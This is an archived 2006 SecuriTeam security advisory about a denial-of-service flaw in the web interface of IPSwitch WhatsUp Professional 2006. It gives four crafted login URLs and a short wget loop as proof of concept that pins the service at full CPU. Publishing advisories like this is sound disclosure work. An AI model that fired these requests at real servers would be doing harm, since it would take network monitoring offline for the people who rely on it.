[NT] IPSwitch WhatsUp Professional DoS ([] Characters)

---

• From: SecuriTeam <support@xxxxxxxxxxxxxx>
• Date: 15 Mar 2006 14:06:22 +0200

---

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -



IPSwitch WhatsUp Professional DoS ([] Characters)
------------------------------------------------------------------------


SUMMARY

<http://ipswitch.com/products/whatsup/professional/index.asp> IPSwitch
WhatsUp Professional is "a network monitoring and mapping tool". A remote
attacker can perform a denial of service attack on WhatsUp Professional
via its web interface

DETAILS

Vulnerable Systems:
* WhatsUp Professional 2006

The web interface service of WhatsUp (NmService.exe) does not handle
certain requests properly. The following URLs can be used to create a DoS
condition due to the NmService using 100% CPU:

http://[target]:81/NmConsole/Login.asp?bIsJavaScriptDisabled=true&;
sLoginPassword=&btnLogIn=[Log&In]=&sLoginUserName=

http://[target]:81/NmConsole/Login.asp?bIsJavaScriptDisabled=true&;
sLoginUserName=&btnLogIn=[Log&In]=&sLoginPassword=

http://[target]:81/NmConsole/Login.asp?bIsJavaScriptDisabled=true&;
sLoginUserName=&sLoginPassword=&In]=&btnLogIn=

http://[target]:81/NmConsole/Login.asp?bIsJavaScriptDisabled=true&;
sLoginUserName=&sLoginPassword=&btnLogIn=[Log&In]=

Proof of Concept Code:
while [ 1 ];
do
wget -O /dev/null
http://[target]:81/NmConsole/Login.asp?bIsJavaScriptDisabled=true&;
sLoginPassword=&b;tnLogIn=[Log&In]=&sLoginUserName=;
done


ADDITIONAL INFORMATION

The information has been provided by <mailto:jzlatin@xxxxxxxx> Josh
Zlatin-Amishav.
The original article can be found at:
<http://zur.homelinux.com/Advisories/ipswitch_dos.txt>
http://zur.homelinux.com/Advisories/ipswitch_dos.txt



========================================


This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@xxxxxxxxxxxxxx
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@xxxxxxxxxxxxxx


====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

---

• Prev by Date: [NT] Vulnerabilities in Microsoft Office Allow Remote Code Execution (MS06-012)
• Next by Date: [EXPL] PeerCast Buffer Overflow (Exploit)
• Previous by thread: [NT] Vulnerabilities in Microsoft Office Allow Remote Code Execution (MS06-012)
• Next by thread: [EXPL] PeerCast Buffer Overflow (Exploit)
• Index(es):
  • Date
  • Thread

---

Relevant Pages [NEWS] Barracuda Spam Firewall Administrator Level Command Execution ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... interface allows execution of commands by unauthenticated users. ... through the web interface using a path sanitation ... It was then possible to leverage further privileges, ... (Securiteam) [NEWS] Motorola Wireless Router WR850G Authentication Circumvention ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... WR850G Wireless Broadband Router, is built with both an 802.11g wireless ... enables an attacker to log into the routers web interface without knowing ... username and password after logging in. ... (Securiteam) [EXPL] phpBB Remote PHP Code Execution (viewtopic.php 2) ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... The following exploit code utilizes a vulnerability in phpBB to cause ... This bulletin is sent to members of the SecuriTeam mailing list. ... In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. ... (Securiteam) [NEWS] Trend Micro ServerProtect Web Interface Authorization Bypass ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Trend Micro ServerProtect Web Interface Authorization Bypass ... Exploitation of this vulnerability allows a remote attacker to edit and ... (Securiteam) [EXPL] TinyWeb Server DoS Exploit ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... The information in this bulletin is provided "AS IS" without warranty of any kind. ... In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. ... (Securiteam)

---

• Security
• UNIX
• Linux
• Coding
• Usenet

• News
• Mailing-Lists
• Newsgroups
• Service
• About
• Privacy
• Search
• Imprint

www.derkeiler.com  > Mailing-Lists  > Securiteam  > 2006-03